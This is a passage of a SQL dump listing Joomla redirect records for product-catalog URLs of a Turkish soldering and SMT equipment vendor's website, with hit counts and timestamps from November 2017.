00:00:00',301),(13776,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın/by,category_name',NULL,'','',1,0,'2017-11-25 11:54:05','0000-00-00 00:00:00',301),(13777,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/smd-ultra-hız?language=tr-tr',NULL,'','',1,0,'2017-11-25 11:58:05','0000-00-00 00:00:00',301),(13778,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/by,product_sku',NULL,'','',2,0,'2017-11-25 12:07:12','0000-00-00 00:00:00',301),(13779,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,mf_name',NULL,'','',6,0,'2017-11-25 12:09:03','0000-00-00 00:00:00',301),(13780,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/by,mf_name',NULL,'','',2,0,'2017-11-25 12:20:42','0000-00-00 00:00:00',301),(13781,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın/dirdesc',NULL,'','',1,0,'2017-11-25 12:21:40','0000-00-00 00:00:00',301),(13782,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/spr-20-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-25 12:23:49','0000-00-00 00:00:00',301),(13783,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,mf_name',NULL,'','',237,0,'2017-11-25 12:23:55','0000-00-00 00:00:00',301),(13784,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri',NULL,'','',8,0,'2017-11-25 12:24:12','0000-00-00 00:00:00',301),(13785,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/tel-lehim/by,category_name?language=tr-tr',NULL,'','',24,0,'2017-11-25 12:28:49','0000-00-00 00:00:00',301),(13786,'http://3s-technologies.com.tr/index.php/en/products/manufacturer/mirae',NULL,'','',13,0,'2017-11-25 12:35:30','0000-00-00 00:00:00',301),(13787,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/spr-20-41-42-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-25 12:37:25','0000-00-00 00:00:00',301),(13788,'http://www.3s-technologies.com.tr/en/products/manufacturer/tolo/smd-fä±rä±n/by,mf_name',NULL,'','',1,0,'2017-11-25 12:37:31','0000-00-00 00:00:00',301),(13789,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',12,0,'2017-11-25 12:42:30','0000-00-00 00:00:00',301),(13790,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/screen-printer/by,mf_name?language=tr-tr',NULL,'','',30,0,'2017-11-25 12:43:23','0000-00-00 00:00:00',301),(13791,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,category_name',NULL,'','',1,0,'2017-11-25 12:51:08','0000-00-00 00:00:00',301),(13792,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,mf_name',NULL,'','',1,0,'2017-11-25 12:51:28','0000-00-00 00:00:00',301),(13793,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',1,0,'2017-11-25 12:53:06','0000-00-00 00:00:00',301),(13794,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-düşük-hızlı/by,product_name',NULL,'','',241,0,'2017-11-25 12:55:49','0000-00-00 00:00:00',301),(13795,'http://3s-technologies.com.tr/tr/images/stories/virtuemart/category/resized/k_sb_2_250x250.png',NULL,'','',4,0,'2017-11-25 13:03:44','0000-00-00 00:00:00',301),(13796,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,mf_name',NULL,'','',1,0,'2017-11-25 13:07:04','0000-00-00 00:00:00',301),(13797,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,mf_name',NULL,'','',2,0,'2017-11-25 13:08:56','0000-00-00 00:00:00',301),(13798,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,`p`.product_sku/dirdesc/results,1-10?language=en-gb',NULL,'','',3,0,'2017-11-25 13:10:12','0000-00-00 00:00:00',301),(13799,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/temizleme-makineleri/by,ordering/results,1-50?language=en-gb',NULL,'','',4,0,'2017-11-25 13:17:08','0000-00-00 00:00:00',301),(13800,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/flux/by,product_sku',NULL,'','',1,0,'2017-11-25 13:27:03','0000-00-00 00:00:00',301),(13801,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/2-el-makineler/rh6-detail',NULL,'','',21,0,'2017-11-25 13:29:41','0000-00-00 00:00:00',301),(13802,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,category_name',NULL,'','',2,0,'2017-11-25 13:30:18','0000-00-00 00:00:00',301),(13803,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,mf_name',NULL,'','',2,0,'2017-11-25 13:30:30','0000-00-00 00:00:00',301),(13804,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,mf_name',NULL,'','',2,0,'2017-11-25 13:30:44','0000-00-00 00:00:00',301),(13805,'http://www.3s-technologies.com.tr/tr/urunler/screen-printer/results,1-20',NULL,'','',18,0,'2017-11-25 13:30:59','0000-00-00 00:00:00',301),(13806,'http://www.3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/screen-printer/dirdesc',NULL,'','',34,0,'2017-11-25 13:38:09','0000-00-00 00:00:00',301),(13807,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,product_sku',NULL,'','',6,0,'2017-11-25 13:38:27','0000-00-00 00:00:00',301),(13808,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,product_sku',NULL,'','',2,0,'2017-11-25 13:39:13','0000-00-00 00:00:00',301),(13809,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,mf_name',NULL,'','',6,0,'2017-11-25 13:46:22','0000-00-00 00:00:00',301),(13810,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',1,0,'2017-11-25 14:02:56','0000-00-00 00:00:00',301),(13811,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/dirdesc',NULL,'','',2,0,'2017-11-25 14:03:49','0000-00-00 00:00:00',301),(13812,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,mf_name',NULL,'','',1,0,'2017-11-25 14:03:55','0000-00-00 00:00:00',301),(13813,'http://3s-technologies.com.tr/index.php/tr/ueruenler/dalga-lehim/by,category_name/dirdesc?language=tr-tr',NULL,'','',13,0,'2017-11-25 14:09:34','0000-00-00 00:00:00',301),(13814,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,ordering?language=en-gb',NULL,'','',23,0,'2017-11-25 14:17:36','0000-00-00 00:00:00',301),(13815,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/screen-printer/sp-18p-l-detail',NULL,'','',1,0,'2017-11-25 14:20:15','0000-00-00 00:00:00',301),(13816,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-düşük-hızlı/by,product_sku',NULL,'','',2,0,'2017-11-25 14:20:21','0000-00-00 00:00:00',301),(13817,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/by,product_name',NULL,'','',5,0,'2017-11-25 14:21:21','0000-00-00 00:00:00',301),(13818,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-25 14:21:40','0000-00-00 00:00:00',301),(13819,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,category_name',NULL,'','',3,0,'2017-11-25 14:22:28','0000-00-00 00:00:00',301),(13820,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,product_sku',NULL,'','',2,0,'2017-11-25 14:23:13','0000-00-00 00:00:00',301),(13821,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-orta-hızlı/by,product_sku',NULL,'','',248,0,'2017-11-25 14:23:44','0000-00-00 00:00:00',301),(13822,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_sku',NULL,'','',1,0,'2017-11-25 14:26:18','0000-00-00 00:00:00',301),(13823,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,category_name',NULL,'','',1,0,'2017-11-25 14:26:21','0000-00-00 00:00:00',301),(13824,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc/results,1-40',NULL,'','',1,0,'2017-11-25 14:33:16','0000-00-00 00:00:00',301),(13825,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_sku',NULL,'','',8,0,'2017-11-25 14:40:10','0000-00-00 00:00:00',301),(13826,'http://www.3s-technologies.com.tr/tr/urunler/temizleme-makineleri/by,product_sku',NULL,'','',44,0,'2017-11-25 14:40:11','0000-00-00 00:00:00',301),(13827,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/by,category_name',NULL,'','',1,0,'2017-11-25 14:41:34','0000-00-00 00:00:00',301),(13828,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',5,0,'2017-11-25 14:41:46','0000-00-00 00:00:00',301),(13829,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/smd-fırın',NULL,'','',1,0,'2017-11-25 14:42:12','0000-00-00 00:00:00',301),(13830,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/thru-hole/by,product_name',NULL,'','',1,0,'2017-11-25 14:43:58','0000-00-00 00:00:00',301),(13831,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',1,0,'2017-11-25 14:53:36','0000-00-00 00:00:00',301),(13832,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme',NULL,'','',13,0,'2017-11-25 14:55:40','0000-00-00 00:00:00',301),(13833,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız/by,product_sku',NULL,'','',3,0,'2017-11-25 14:57:22','0000-00-00 00:00:00',301),(13834,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_name/dirdesc?language=en-gb',NULL,'','',24,0,'2017-11-25 15:01:15','0000-00-00 00:00:00',301),(13835,'http://www.3s-technologies.com.tr/index.php/en/products/bölgesel-lehimleme/by,mf_name?language=en-gb',NULL,'','',1,0,'2017-11-25 15:01:32','0000-00-00 00:00:00',301),(13836,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/krem-lehim/by,product_sku',NULL,'','',48,0,'2017-11-25 15:02:12','0000-00-00 00:00:00',301),(13837,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/thru-hole/by,category_name',NULL,'','',1,0,'2017-11-25 15:06:04','0000-00-00 00:00:00',301),(13838,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/dirdesc',NULL,'','',1,0,'2017-11-25 15:09:05','0000-00-00 00:00:00',301),(13839,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/jvk-detail',NULL,'','',11,0,'2017-11-25 15:09:39','0000-00-00 00:00:00',301),(13840,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',236,0,'2017-11-25 15:21:44','0000-00-00 00:00:00',301),(13841,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,product_name',NULL,'','',6,0,'2017-11-25 15:38:41','0000-00-00 00:00:00',301),(13842,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/panasonic/screen-printer/by,ordering?language=tr-tr',NULL,'','',7,0,'2017-11-25 15:42:49','0000-00-00 00:00:00',301),(13843,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-25 15:51:21','0000-00-00 00:00:00',301),(13844,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/by,product_sku',NULL,'','',2,0,'2017-11-25 15:52:18','0000-00-00 00:00:00',301),(13845,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-fırın',NULL,'','',12,0,'2017-11-25 15:54:07','0000-00-00 00:00:00',301),(13846,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/krem-lehim/by,pc.ordering,product_name',NULL,'','',1,0,'2017-11-25 15:58:36','0000-00-00 00:00:00',301),(13847,'http://www.3s-technologies.com.tr/en/products/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',36,0,'2017-11-25 16:04:29','0000-00-00 00:00:00',301),(13848,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/by,mf_name',NULL,'','',2,0,'2017-11-25 16:05:28','0000-00-00 00:00:00',301),(13849,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-orta-hızlı/by,product_name',NULL,'','',3,0,'2017-11-25 16:05:45','0000-00-00 00:00:00',301),(13850,'http://www.3s-technologies.com.tr/tr/urunler/thru-hole/by,mf_name/dirdesc',NULL,'','',2,0,'2017-11-25 16:10:11','0000-00-00 00:00:00',301),(13851,'http://www.3s-technologies.com.tr/tr/joomla/images/pdf/gf_conveyer_and_batch_reflow_ovens.pdf',NULL,'','',19,0,'2017-11-25 16:16:12','0000-00-00 00:00:00',301),(13852,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc/results,1-10',NULL,'','',1,0,'2017-11-25 16:24:03','0000-00-00 00:00:00',301),(13853,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/screen-printer/spr-20-detail',NULL,'','',1,0,'2017-11-25 16:36:30','0000-00-00 00:00:00',301),(13854,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/by,mf_name',NULL,'','',9,0,'2017-11-25 16:36:32','0000-00-00 00:00:00',301),(13855,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri/by,product_name',NULL,'','',2,0,'2017-11-25 16:37:28','0000-00-00 00:00:00',301),(13856,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/dalga-lehim/dirdesc',NULL,'','',7,0,'2017-11-25 16:49:40','0000-00-00 00:00:00',301),(13857,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-20',NULL,'','',1,0,'2017-11-25 16:51:44','0000-00-00 00:00:00',301),(13858,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/tolo/dalga-lehim/dirdesc',NULL,'','',1,0,'2017-11-25 16:52:34','0000-00-00 00:00:00',301),(13859,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-orta-hızlı/by,category_name',NULL,'','',1,0,'2017-11-25 16:53:59','0000-00-00 00:00:00',301),(13860,'http://3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/çubuk-lehim/e-bar-26-detail/askquestion?tmpl=component',NULL,'','',170,0,'2017-11-25 16:54:27','0000-00-00 00:00:00',301),(13861,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/temizleme-makineleri',NULL,'','',14,0,'2017-11-25 17:04:02','0000-00-00 00:00:00',301),(13862,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',1,0,'2017-11-25 17:06:39','0000-00-00 00:00:00',301),(13863,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/dirdesc',NULL,'','',1,0,'2017-11-25 17:20:28','0000-00-00 00:00:00',301),(13864,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,product_name/dirdesc/results,1-20',NULL,'','',2,0,'2017-11-25 17:33:16','0000-00-00 00:00:00',301),(13865,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,product_name',NULL,'','',1,0,'2017-11-25 17:49:30','0000-00-00 00:00:00',301),(13866,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/konveyorler/dirdesc',NULL,'','',1,0,'2017-11-25 17:50:21','0000-00-00 00:00:00',301),(13867,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/temizleme-makineleri/by,ordering?language=tr-tr',NULL,'','',25,0,'2017-11-25 17:52:43','0000-00-00 00:00:00',301),(13868,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/temizleme-makineleri/by,category_name',NULL,'','',1,0,'2017-11-25 17:54:34','0000-00-00 00:00:00',301),(13869,'http://3s-technologies.com.tr/en/products/manufacturer/panasonic/smd-ultra-hız',NULL,'','',422,0,'2017-11-25 17:55:46','0000-00-00 00:00:00',301),(13870,'http://3s-technologies.com.tr/index.php/tr/anasayfa2/80-turkish-tr/turkish-content',NULL,'','',13,0,'2017-11-25 18:06:08','0000-00-00 00:00:00',301),(13871,'http://www.3s-technologies.com.tr/en/products/lehimleme-malzemeleri/flux/955lc-37-detail',NULL,'','',24,0,'2017-11-25 18:08:55','0000-00-00 00:00:00',301),(13872,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-10',NULL,'','',3,0,'2017-11-25 18:14:48','0000-00-00 00:00:00',301),(13873,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/dirdesc',NULL,'','',241,0,'2017-11-25 18:28:06','0000-00-00 00:00:00',301),(13874,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,mf_name',NULL,'','',4,0,'2017-11-25 18:30:17','0000-00-00 00:00:00',301),(13875,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/stencil-washer-eco-detail?tmpl=component&print=1',NULL,'','',3,0,'2017-11-25 18:36:15','0000-00-00 00:00:00',301),(13876,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/index.php/en/products/temizleme-makineleri/by,product_sku/results,1-10?language=en-gb',NULL,'','',4,0,'2017-11-25 18:49:25','0000-00-00 00:00:00',301),(13877,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-40',NULL,'','',5,0,'2017-11-25 18:56:21','0000-00-00 00:00:00',301),(13878,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/çubuk-lehim/by,product_name',NULL,'','',1,0,'2017-11-25 19:00:38','0000-00-00 00:00:00',301),(13879,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux/dirdesc',NULL,'','',1,0,'2017-11-25 19:04:16','0000-00-00 00:00:00',301),(13880,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,mf_name',NULL,'','',1,0,'2017-11-25 19:04:52','0000-00-00 00:00:00',301),(13881,'http://3s-technologies.com.tr/index.php/tr/ueruenler/manufacturer/tolo/dalga-lehim/by,mf_name?language=tr-tr',NULL,'','',7,0,'2017-11-25 19:07:43','0000-00-00 00:00:00',301),(13882,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/tel-lehim/by,category_name/dirdesc/results,1-40',NULL,'','',7,0,'2017-11-25 19:10:11','0000-00-00 00:00:00',301),(13883,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-5',NULL,'','',3,0,'2017-11-25 19:24:02','0000-00-00 00:00:00',301),(13884,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-orta-hızlı/by,category_name',NULL,'','',1,0,'2017-11-25 19:25:06','0000-00-00 00:00:00',301),(13885,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae',NULL,'','',1,0,'2017-11-25 19:32:19','0000-00-00 00:00:00',301),(13886,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/smd-fırın/by,product_name',NULL,'','',7,0,'2017-11-25 19:32:59','0000-00-00 00:00:00',301),(13887,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim',NULL,'','',9,0,'2017-11-25 19:37:54','0000-00-00 00:00:00',301),(13888,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-orta-hızlı',NULL,'','',1,0,'2017-11-25 19:38:55','0000-00-00 00:00:00',301),(13889,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/flux',NULL,'','',15,0,'2017-11-25 19:39:11','0000-00-00 00:00:00',301),(13890,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,category_name',NULL,'','',1,0,'2017-11-25 19:42:19','0000-00-00 00:00:00',301),(13891,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/dalga-lehim/by,mf_name',NULL,'','',4,0,'2017-11-25 19:43:00','0000-00-00 00:00:00',301),(13892,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/konveyorler/dirdesc',NULL,'','',1,0,'2017-11-25 19:44:33','0000-00-00 00:00:00',301),(13893,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/smd-fırın',NULL,'','',1,0,'2017-11-25 19:45:03','0000-00-00 00:00:00',301),(13894,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/by,`p`.product_sku/dirdesc/results,1-20',NULL,'','',6,0,'2017-11-25 19:45:39','0000-00-00 00:00:00',301),(13895,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/by,mf_name',NULL,'','',1,0,'2017-11-25 19:46:14','0000-00-00 00:00:00',301),(13896,'http://www.3s-technologies.com.tr/index.php/en/products/manufacturer/tolo/dalga-lehim/by,product_name?language=en-gb',NULL,'','',24,0,'2017-11-25 19:48:29','0000-00-00 00:00:00',301),(13897,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer/by,category_name',NULL,'','',2,0,'2017-11-25 19:55:39','0000-00-00 00:00:00',301),(13898,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/ddm-novastar/screen-printer',NULL,'','',2,0,'2017-11-25 19:57:37','0000-00-00 00:00:00',301),(13899,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-ultra-hız/dirdesc',NULL,'','',1,0,'2017-11-25 20:08:47','0000-00-00 00:00:00',301),(13900,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı/by,product_name',NULL,'','',3,0,'2017-11-25 20:08:51','0000-00-00 00:00:00',301),(13901,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/by,`p`.product_sku/dirdesc?language=en-gb',NULL,'','',22,0,'2017-11-25 20:10:39','0000-00-00 00:00:00',301),(13902,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,mf_name',NULL,'','',2,0,'2017-11-25 20:20:40','0000-00-00 00:00:00',301),(13903,'http://www.3s-technologies.com.tr/index.php/en/products/dalga-lehim/lfs-1-detail/askquestion?tmpl=component',NULL,'','',25,0,'2017-11-25 20:24:42','0000-00-00 00:00:00',301),(13904,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/bölgesel-lehimleme/dirdesc',NULL,'','',2,0,'2017-11-25 20:35:10','0000-00-00 00:00:00',301),(13905,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/smd-ultra-hız',NULL,'','',8,0,'2017-11-25 20:35:23','0000-00-00 00:00:00',301),(13906,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/dalga-lehim',NULL,'','',1,0,'2017-11-25 20:38:31','0000-00-00 00:00:00',301),(13907,'http://3s-technologies.com.tr/en/products/manufacturer/mirae/smd-ultra-hız/by,`p`.product_sku/results,1-20',NULL,'','',1,0,'2017-11-25 20:40:12','0000-00-00 00:00:00',301),(13908,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_name/results,1-20',NULL,'','',4,0,'2017-11-25 20:47:06','0000-00-00 00:00:00',301),(13909,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/smd-ultra-hız',NULL,'','',14,0,'2017-11-25 20:54:05','0000-00-00 00:00:00',301),(13910,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/screen-printer/by,category_name',NULL,'','',5,0,'2017-11-25 20:54:36','0000-00-00 00:00:00',301),(13911,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,product_name',NULL,'','',4,0,'2017-11-25 21:08:07','0000-00-00 00:00:00',301),(13912,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/bölgesel-lehimleme/by,category_name',NULL,'','',1,0,'2017-11-25 21:09:33','0000-00-00 00:00:00',301),(13913,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/lehimleme-malzemeleri/çubuk-lehim/by,product_sku/results,1-100',NULL,'','',1,0,'2017-11-25 21:21:40','0000-00-00 00:00:00',301),(13914,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/dalga-lehim',NULL,'','',1,0,'2017-11-25 21:23:11','0000-00-00 00:00:00',301),(13915,'http://3s-technologies.com.tr/index.php/en/products/smd-fırın/gf-12-hc-ht-detail/askquestion?tmpl=component',NULL,'','',169,0,'2017-11-25 21:28:54','0000-00-00 00:00:00',301),(13916,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/tolo/smd-fırın',NULL,'','',2,0,'2017-11-25 21:54:52','0000-00-00 00:00:00',301),(13917,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/mirae/smd-ultra-hız/by,category_name',NULL,'','',239,0,'2017-11-25 22:01:17','0000-00-00 00:00:00',301),(13918,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/panasonic/screen-printer/by,product_name',NULL,'','',2,0,'2017-11-25 22:04:08','0000-00-00 00:00:00',301),(13919,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/rl132-detail?tmpl=component&print=1',NULL,'','',1,0,'2017-11-25 22:04:55','0000-00-00 00:00:00',301),(13920,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/smd-ultra-hız/by,product_sku',NULL,'','',1,0,'2017-11-25 22:05:18','0000-00-00 00:00:00',301),(13921,'http://3s-technologies.com.tr/en/products/manufacturer/ddm-novastar/dalga-lehim/dirdesc/results,1-10?language=en-gb',NULL,'','',4,0,'2017-11-25 22:21:58','0000-00-00 00:00:00',301),(13922,'http://www.3s-technologies.com.tr/index.php/en/products/lehimleme-malzemeleri/tel-lehim/275-k100-1.2mm-detail/askquestion?tmpl=component',NULL,'','',24,0,'2017-11-25 22:23:11','0000-00-00 00:00:00',301),(13923,'http://proneo-led.com/3s-technologies.com.tr/joomla/en/products/manufacturer/panasonic/smd-orta-hızlı/by,product_sku',NULL,'','',236,0,'2017-11-25 22:34:39','0000-00-00 00:00:00',301),(13924,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/ddm-novastar/screen-printer/by,category_name',NULL,'','',5,0,'2017-11-25 22:35:37','0000-00-00 00:00:00',301),(13925,'http://www.3s-technologies.com.tr/tr/urunler/lehimleme-malzemeleri/tel-lehim/by,ordering/results,1-10',NULL,'','',9,0,'2017-11-25 23:03:17','0000-00-00 00:00:00',301),(13926,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/2-el-makineler/by,product_name',NULL,'','',2,0,'2017-11-25 23:06:06','0000-00-00 00:00:00',301),(13927,'http://proneo-led.com/3s-technologies.com.tr/joomla/tr/urunler/manufacturer/mirae/smd-orta-hızlı/dirdesc',NULL,'','',1,0,'2017-11-25 23:07:03','0000-00-00 